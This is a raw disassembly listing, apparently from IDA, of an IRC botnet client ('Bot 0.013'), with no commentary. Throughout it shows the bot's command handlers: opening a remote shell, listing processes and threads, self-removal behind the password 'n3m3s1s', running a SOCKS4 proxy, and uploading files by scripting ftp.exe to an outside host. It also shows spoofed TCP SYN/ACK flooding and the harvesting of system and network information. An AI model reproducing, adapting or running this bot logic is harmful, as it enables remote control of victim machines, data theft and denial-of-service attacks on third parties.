call sub_413922
test eax, eax
pop ecx
jle short loc_40E4C2
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp loc_40DAB5
; ---------------------------------------------------------------------------
loc_40E4C2: ; CODE XREF: sub_409848+4C6E�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_410729
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40E4E1
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp loc_40DAB5
; ---------------------------------------------------------------------------
loc_40E4E1: ; CODE XREF: sub_409848+4C8D�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
jmp loc_40DAB5
; ---------------------------------------------------------------------------
loc_40E4EB: ; CODE XREF: sub_409848+135A�j
; sub_409848+136E�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_406EA4
jmp loc_40E7C6
; ---------------------------------------------------------------------------
loc_40E504: ; CODE XREF: sub_409848+1332�j
; sub_409848+1346�j
push [ebp+ebx+var_A0]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_403482
jmp loc_40E7C6
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_409848+130A�j
; sub_409848+131E�j
or esi, 0FFFFFFFFh
call dword_422004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov edi, eax
jz short loc_40E549
push ebx
call sub_416D02
pop ecx
mov esi, eax
loc_40E549: ; CODE XREF: sub_409848+4CF6�j
xor edx, edx
mov eax, edi
mov ecx, 15180h
div ecx
cmp eax, esi
jnb short loc_40E561
cmp esi, 0FFFFFFFFh
jnz loc_40F93F
loc_40E561: ; CODE XREF: sub_409848+4D0E�j
push 0
call sub_4129E9
push eax
lea eax, [ebp+var_2F0]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
loc_40E5A0: ; CODE XREF: sub_409848+27CD�j
add esp, 28h
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40E5A8: ; CODE XREF: sub_409848+12E2�j
; sub_409848+12F6�j
push 1Fh
call sub_413922
test eax, eax
pop ecx
jle short loc_40E5DE
cmp [ebp+var_C], 0
jnz loc_409AC6
push 0
push [ebp+var_4]
push offset aProcAlreadyRun ; "[PROC]: Already running."
loc_40E5C8: ; CODE XREF: sub_409848+2250�j
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40E5DE: ; CODE XREF: sub_409848+4D6A�j
push [ebp+var_9C]
lea eax, [ebp+var_384]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
and [ebp+var_300], 0
mov [ebp+var_388], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_2F8], eax
jz short loc_40E63F
push 5
mov edi, ebx
mov esi, offset aFull ; "full"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40E63F
mov [ebp+var_300], 1
loc_40E63F: ; CODE XREF: sub_409848+4DDB�j
; sub_409848+4DEB�j
lea eax, [ebp+var_2F0]
push offset aProcsProccessL ; "[PROCS]: Proccess list."
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Fh
push eax
call sub_413732
add esp, 14h
mov [ebp+var_304], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_40905C
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_304]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40E6C1
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aProcsFailedToS ; "[PROCS]: Failed to start listing thread"...
push eax
call sub_416975
add esp, 0Ch
jmp loc_40D1E9
; ---------------------------------------------------------------------------
loc_40E6B9: ; CODE XREF: sub_409848+4E7F�j
push 32h
call dword_422000 ; Sleep
loc_40E6C1: ; CODE XREF: sub_409848+4E4F�j
cmp [ebp+var_2F4], esi
jz short loc_40E6B9
jmp loc_40D1E9
; ---------------------------------------------------------------------------
loc_40E6CE: ; CODE XREF: sub_409848+12BA�j
; sub_409848+12CE�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz loc_409AC6
mov esi, ebx
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40E6E4: ; CODE XREF: sub_409848+4EB8�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40E706
test cl, cl
jz short loc_40E702
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40E706
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40E6E4
loc_40E702: ; CODE XREF: sub_409848+4EA6�j
xor eax, eax
jmp short loc_40E70B
; ---------------------------------------------------------------------------
loc_40E706: ; CODE XREF: sub_409848+4EA2�j
; sub_409848+4EB0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E70B: ; CODE XREF: sub_409848+4EBC�j
test eax, eax
jnz loc_409AC6
cmp [ebp+var_C], eax
jnz short loc_40E732
push eax
push [ebp+var_4]
push offset aMainRemovingBo ; "[MAIN]: Removing Bot."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40E732: ; CODE XREF: sub_409848+4ECE�j
push [ebp+arg_4]
call dword_43A4D0 ; closesocket
call dword_43A4DC ; WSACleanup
call sub_407576
jmp loc_40EE72
; ---------------------------------------------------------------------------
loc_40E74B: ; CODE XREF: sub_409848+1292�j
; sub_409848+12A6�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push eax
call sub_412B6A
pop ecx
pop ecx
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
push offset aMainSystemInfo ; "[MAIN]: System Info."
jmp short loc_40E7A5
; ---------------------------------------------------------------------------
loc_40E777: ; CODE XREF: sub_409848+126A�j
; sub_409848+127E�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_412DD1
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
push offset aMainNetworkInf ; "[MAIN]: Network Info."
loc_40E7A5: ; CODE XREF: sub_409848+4C5F�j
; sub_409848+4F2D�j
call sub_401F0F
loc_40E7AA: ; CODE XREF: sub_409848+36B7�j
add esp, 18h
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40E7B2: ; CODE XREF: sub_409848+1242�j
; sub_409848+1256�j
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401FAF
loc_40E7C6: ; CODE XREF: sub_409848+1DF�j
; sub_409848+4CB7�j ...
add esp, 10h
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40E7CE: ; CODE XREF: sub_409848+121A�j
; sub_409848+122E�j
and [ebp+var_7EC], 0
cmp [ebp+var_14], 0
jz short loc_40E80F
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40E80F
push ebx
push [ebp+var_14]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_40E80F
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_7EC]
push 80h
push eax
call sub_416BCD
add esp, 10h
loc_40E80F: ; CODE XREF: sub_409848+4F91�j
; sub_409848+4F9C�j ...
push [ebp+var_9C]
lea eax, [ebp+var_86C]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+arg_4]
mov [ebp+var_870], eax
mov eax, [ebp+var_4]
mov [ebp+var_768], eax
mov eax, [ebp+var_C]
mov [ebp+var_764], eax
lea eax, [ebp+var_2F0]
push offset aLogListingLog_ ; "[LOG]: Listing log."
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Dh
push eax
call sub_413732
add esp, 20h
mov [ebp+var_76C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_870]
push eax
push offset sub_402021
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_76C]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40E8B4
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aLogFailedToSta ; "[LOG]: Failed to start listing thread, "...
jmp loc_40FAF8
; ---------------------------------------------------------------------------
loc_40E8AC: ; CODE XREF: sub_409848+5072�j
push 32h
call dword_422000 ; Sleep
loc_40E8B4: ; CODE XREF: sub_409848+5051�j
cmp [ebp+var_760], esi
jz short loc_40E8AC
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40E8C1: ; CODE XREF: sub_409848+11F2�j
; sub_409848+1206�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401E97
push offset aMainAliasList_ ; "[MAIN]: Alias list."
call sub_401F0F
loc_40E8DC: ; CODE XREF: sub_409848+4BC0�j
add esp, 10h
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40E8E4: ; CODE XREF: sub_409848+11CA�j
; sub_409848+11DE�j
push [ebp+var_9C]
lea eax, [ebp+var_484]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_A0]
mov [ebp+var_488], eax
mov eax, [ebp+var_4]
mov [ebp+var_3FC], eax
mov eax, [ebp+var_C]
add esp, 0Ch
test ebx, ebx
mov [ebp+var_3F8], eax
jz short loc_40E93D
push 4
xor eax, eax
mov edi, offset aSub ; "sub"
mov esi, ebx
pop ecx
repe cmpsb
setz al
mov [ebp+var_400], eax
jmp short loc_40E944
; ---------------------------------------------------------------------------
loc_40E93D: ; CODE XREF: sub_409848+50DA�j
and [ebp+var_400], 0
loc_40E944: ; CODE XREF: sub_409848+50F3�j
lea eax, [ebp+var_2F0]
push offset aThreadsListThr ; "[THREADS]: List threads."
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 20h
push eax
call sub_413732
add esp, 14h
mov [ebp+var_404], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_488]
push eax
push offset sub_413A33
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_404]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40E9B7
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aThreadsFaile_0 ; "[THREADS]: Failed to start list thread,"...
jmp loc_40D747
; ---------------------------------------------------------------------------
loc_40E9AF: ; CODE XREF: sub_409848+5175�j
push 32h
call dword_422000 ; Sleep
loc_40E9B7: ; CODE XREF: sub_409848+5154�j
cmp [ebp+var_3F4], esi
jz short loc_40E9AF
jmp loc_40AF34
; ---------------------------------------------------------------------------
loc_40E9C4: ; CODE XREF: sub_409848+1150�j
; sub_409848+1164�j
push offset aBot013 ; "Bot013"
lea eax, [ebp+var_2F0]
push offset aMainBotIdS_ ; "[MAIN]: Bot ID: %s."
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 20h
jmp loc_40AF34
; ---------------------------------------------------------------------------
loc_40E9FC: ; CODE XREF: sub_409848+1128�j
; sub_409848+113C�j
push dword_480AD8
call sub_4129E9
push eax
lea eax, [ebp+var_2F0]
push offset aMainStatusRead ; "[MAIN]: Status: Ready. Bot Uptime: %s."
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 24h
jmp loc_40AF34
; ---------------------------------------------------------------------------
loc_40EA3B: ; CODE XREF: sub_409848+1100�j
; sub_409848+1114�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40EA6E
cmp [ebp+var_14], 0
jz short loc_40EA7D
push ebx
push [ebp+var_14]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_40EA7D
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_405D17
add esp, 0Ch
jmp short loc_40EA7D
; ---------------------------------------------------------------------------
loc_40EA6E: ; CODE XREF: sub_409848+51FC�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_405D17
pop ecx
pop ecx
loc_40EA7D: ; CODE XREF: sub_409848+5202�j
; sub_409848+5211�j ...
push 0FFFFFFFEh
pop eax
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40EA85: ; CODE XREF: sub_409848+10D8�j
; sub_409848+10EC�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_405D17
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401F0F
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40EAA7: ; CODE XREF: sub_409848+10B0�j
; sub_409848+10C4�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_405D17
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401F0F
add esp, 0Ch
xor eax, eax
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40EAC8: ; CODE XREF: sub_409848+1088�j
; sub_409848+109C�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call start
loc_40EAD9: ; CODE XREF: sub_409848+361E�j
add esp, 0Ch
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40EAE1: ; CODE XREF: sub_409848+FE8�j
; sub_409848+FFC�j
push [ebp+ebx+var_A0]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
jmp short loc_40EB09
; ---------------------------------------------------------------------------
loc_40EAF6: ; CODE XREF: sub_409848+FC0�j
; sub_409848+FD4�j
push [ebp+ebx+var_A0]
push 1Ch
push offset aFindFile ; "Find file"
push offset aFindfile_0 ; "[FINDFILE]"
loc_40EB09: ; CODE XREF: sub_409848+E45�j
; sub_409848+E6D�j ...
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_413968
add esp, 20h
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40EB25: ; CODE XREF: sub_409848+E08�j
; sub_409848+E1C�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40EB44
push esi
call sub_416D02
test eax, eax
pop ecx
jz short loc_40EB44
push esi
call sub_416D02
pop ecx
jmp short loc_40EB49
; ---------------------------------------------------------------------------
loc_40EB44: ; CODE XREF: sub_409848+52E6�j
; sub_409848+52F1�j
mov eax, dword_42FCB8
loc_40EB49: ; CODE XREF: sub_409848+52FA�j
mov ebx, [ebp+ebx+var_9C]
xor edi, edi
cmp ebx, edi
mov [ebp+var_40C], eax
jz short loc_40EB70
push ebx
loc_40EB5D: ; CODE XREF: sub_409848+5338�j
lea eax, [ebp+var_41C]
push 10h
push eax
call sub_416BCD
add esp, 0Ch
jmp short loc_40EB89
; ---------------------------------------------------------------------------
loc_40EB70: ; CODE XREF: sub_409848+5312�j
cmp [ebp+var_38F], 0
jz short loc_40EB82
lea eax, [ebp+var_F0]
push eax
jmp short loc_40EB5D
; ---------------------------------------------------------------------------
loc_40EB82: ; CODE XREF: sub_409848+532F�j
and [ebp+var_41C], 0
loc_40EB89: ; CODE XREF: sub_409848+5326�j
mov eax, [ebp+var_4]
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_400], eax
mov eax, [ebp+var_C]
mov [ebp+var_3FC], eax
lea eax, [ebp+var_49C]
push 80h
push eax
mov [ebp+var_4A0], esi
call sub_416BCD
add esp, 0Ch
push [ebp+var_40C]
push esi
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_416975
push edi
lea eax, [ebp+var_2F0]
push 12h
push eax
call sub_413732
add esp, 1Ch
mov [ebp+var_408], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_4A0]
push eax
push offset sub_41248E
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_408]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40EC3D
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40FAF8
; ---------------------------------------------------------------------------
loc_40EC35: ; CODE XREF: sub_409848+53FB�j
push 32h
call dword_422000 ; Sleep
loc_40EC3D: ; CODE XREF: sub_409848+53DA�j
cmp [ebp+var_3F8], edi
jz short loc_40EC35
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40EC4A: ; CODE XREF: sub_409848+DB8�j
; sub_409848+DCC�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40EC72
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40EC72
and [ebp+var_300], eax
jmp short loc_40EC7C
; ---------------------------------------------------------------------------
loc_40EC72: ; CODE XREF: sub_409848+5410�j
; sub_409848+5420�j
mov [ebp+var_300], 1
loc_40EC7C: ; CODE XREF: sub_409848+5428�j
push [ebp+var_9C]
lea eax, [ebp+var_384]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+arg_4]
mov [ebp+var_388], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_300], esi
mov [ebp+var_2F8], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40ECC5
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40ECC5: ; CODE XREF: sub_409848+5476�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416BCD
push esi
lea eax, [ebp+var_2F0]
push 1Ah
push eax
call sub_413732
add esp, 1Ch
mov [ebp+var_304], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_411987
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_304]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40ED3C
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
jmp loc_40CA14
; ---------------------------------------------------------------------------
loc_40ED34: ; CODE XREF: sub_409848+54FA�j
push 32h
call dword_422000 ; Sleep
loc_40ED3C: ; CODE XREF: sub_409848+54D9�j
cmp [ebp+var_2F4], esi
jz short loc_40ED34
jmp loc_40EE4D
; ---------------------------------------------------------------------------
loc_40ED49: ; CODE XREF: sub_409848+D90�j
; sub_409848+DA4�j
push offset aBot0_013 ; "[Bot 0.013]"
push offset aMainS ; "[MAIN]: %s"
loc_40ED53: ; CODE XREF: sub_409848+3D5C�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
loc_40ED5F: ; CODE XREF: sub_409848+4C14�j
add esp, 0Ch
jmp loc_40B963
; ---------------------------------------------------------------------------
loc_40ED67: ; CODE XREF: sub_409848+D68�j
; sub_409848+D7C�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40EDBF
push ebx
call sub_416D02
test eax, eax
pop ecx
jl short loc_40EDB7
cmp eax, 2
jge short loc_40EDB7
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40EDAF
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_416975
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40EE2A
; ---------------------------------------------------------------------------
loc_40EDAF: ; CODE XREF: sub_409848+5548�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40EE1B
; ---------------------------------------------------------------------------
loc_40EDB7: ; CODE XREF: sub_409848+5533�j
; sub_409848+5538�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40EE1B
; ---------------------------------------------------------------------------
loc_40EDBF: ; CODE XREF: sub_409848+5528�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40EDC4: ; CODE XREF: sub_409848+55B9�j
mov esi, [ebp+var_A4]
mov eax, edx
loc_40EDCC: ; CODE XREF: sub_409848+55A0�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40EDEE
test cl, cl
jz short loc_40EDEA
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40EDEE
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40EDCC
loc_40EDEA: ; CODE XREF: sub_409848+558E�j
xor eax, eax
jmp short loc_40EDF3
; ---------------------------------------------------------------------------
loc_40EDEE: ; CODE XREF: sub_409848+558A�j
; sub_409848+5598�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40EDF3: ; CODE XREF: sub_409848+55A4�j
test eax, eax
jz short loc_40EE05
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40EDC4
jmp short loc_40EE2A
; ---------------------------------------------------------------------------
loc_40EE05: ; CODE XREF: sub_409848+55AD�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40EE1B: ; CODE XREF: sub_409848+1CBB�j
; sub_409848+1CE9�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
loc_40EE2A: ; CODE XREF: sub_409848+1C93�j
; sub_409848+1CAA�j ...
cmp [ebp+var_C], 0
jnz short loc_40EE4D
push 0
loc_40EE32: ; CODE XREF: sub_409848+59E4�j
; sub_409848+5DE9�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40EE45: ; CODE XREF: sub_409848+2C46�j
; sub_409848+2E56�j ...
call sub_405D62
add esp, 14h
loc_40EE4D: ; CODE XREF: sub_409848+11B7�j
; sub_409848+2C30�j ...
xor esi, esi
inc esi
jmp loc_40AF37
; ---------------------------------------------------------------------------
loc_40EE55: ; CODE XREF: sub_409848+D40�j
; sub_409848+D54�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E0
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AC9B
call sub_4138A3
loc_40EE72: ; CODE XREF: sub_409848+4EFE�j
push 0
call dword_422040 ; ExitProcess
loc_40EE7A: ; CODE XREF: sub_409848+153B�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F031
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F031
cmp [ebp+ebx+var_90], edx
jz loc_409AC6
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40F93F
mov edi, [ebp+ebx+var_90]
push 4
push edi
call sub_40318A
test eax, eax
pop ecx
pop ecx
jnz short loc_40EEF2
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40EEDE: ; CODE XREF: sub_409848+4263�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
jmp loc_40D1C6
; ---------------------------------------------------------------------------
loc_40EEF2: ; CODE XREF: sub_409848+568E�j
call dword_422004 ; GetTickCount
push eax
call sub_416B24
pop ecx
call sub_416B31
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_416B31
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_416B31
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_1E04]
push edx
push eax
lea eax, [ebp+var_1560]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_416975
lea eax, [ebp+var_1560]
push offset aAb ; "ab"
push eax
call sub_41720C
add esp, 20h
test eax, eax
mov [ebp+var_1C], eax
jz loc_409AC6
mov esi, [ebp+ebx+var_A0]
push edi
push [ebp+arg_0]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_4178A4
push [ebp+var_1C]
call sub_416E7D
lea eax, [ebp+var_1560]
push eax
lea eax, [ebp+var_85C]
push offset aSS_4 ; "-s:%s"
push eax
call sub_416975
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_85C]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_43A4CC ; ShellExecuteA
test eax, eax
push esi
push edi
jz short loc_40EFCD
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40EFD2
; ---------------------------------------------------------------------------
loc_40EFCD: ; CODE XREF: sub_409848+577C�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40EFD2: ; CODE XREF: sub_409848+5783�j
call sub_416975
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40EFFD
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40EFFD: ; CODE XREF: sub_409848+5796�j
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
jmp short loc_40F017
; ---------------------------------------------------------------------------
loc_40F00B: ; CODE XREF: sub_409848+57E2�j
lea eax, [ebp+var_1560]
push eax
call sub_418075
loc_40F017: ; CODE XREF: sub_409848+57C1�j
lea eax, [ebp+var_1560]
push 4
push eax
call sub_40318A
add esp, 0Ch
test eax, eax
jnz short loc_40F00B
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40F031: ; CODE XREF: sub_409848+5640�j
; sub_409848+5654�j
push [ebp+ebx+var_90]
push [ebp+arg_0]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
call sub_416D02
pop ecx
push eax
push [ebp+ebx+var_A0]
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_40503C
jmp loc_40F93C
; ---------------------------------------------------------------------------
loc_40F070: ; CODE XREF: sub_409848+1513�j
; sub_409848+1527�j
push [ebp+ebx+var_A0]
lea eax, [ebp+var_1134]
push 80h
push eax
call sub_416BCD
add esp, 0Ch
push 4
lea edi, [ebp+var_1134]
mov esi, offset aSyn ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40F0D1
push 4
lea edi, [ebp+var_1134]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40F0D1
push 7
lea edi, [ebp+var_1134]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40F0D1
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40F212
; ---------------------------------------------------------------------------
loc_40F0D1: ; CODE XREF: sub_409848+5855�j
; sub_409848+5869�j ...
push [ebp+arg_0]
call sub_416D02
test eax, eax
pop ecx
mov [ebp+var_102C], eax
jle loc_40F20D
mov eax, [ebp+ebx+var_A0]
push eax
mov [ebp+var_8], eax
mov esi, 80h
lea eax, [ebp+var_1134]
push esi
push eax
call sub_416BCD
mov edi, [ebp+ebx+var_9C]
push edi
lea eax, [ebp+var_11B4]
push esi
push eax
call sub_416BCD
mov ebx, [ebp+ebx+var_98]
push ebx
call sub_416D02
push [ebp+var_9C]
mov [ebp+var_1030], eax
xor eax, eax
cmp byte ptr [ebp+var_380+2], al
push esi
setnz al
mov [ebp+var_1028], eax
mov eax, [ebp+arg_4]
mov [ebp+var_11B8], eax
lea eax, [ebp+var_10B4]
push eax
call sub_416BCD
mov eax, [ebp+var_4]
mov [ebp+var_1024], eax
mov eax, [ebp+var_C]
add esp, 28h
cmp [ebp+var_1028], 0
mov [ebp+var_1020], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40F182
mov eax, offset aNormal ; "Normal"
loc_40F182: ; CODE XREF: sub_409848+5933�j
push [ebp+arg_0]
push ebx
push edi
push [ebp+var_8]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416BCD
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Dh
push eax
call sub_413732
add esp, 2Ch
mov [ebp+var_1034], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_11B8]
push eax
push offset sub_412E87
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_1034]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40F203
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40F8C9
; ---------------------------------------------------------------------------
loc_40F1FB: ; CODE XREF: sub_409848+59C1�j
push 32h
call dword_422000 ; Sleep
loc_40F203: ; CODE XREF: sub_409848+59A0�j
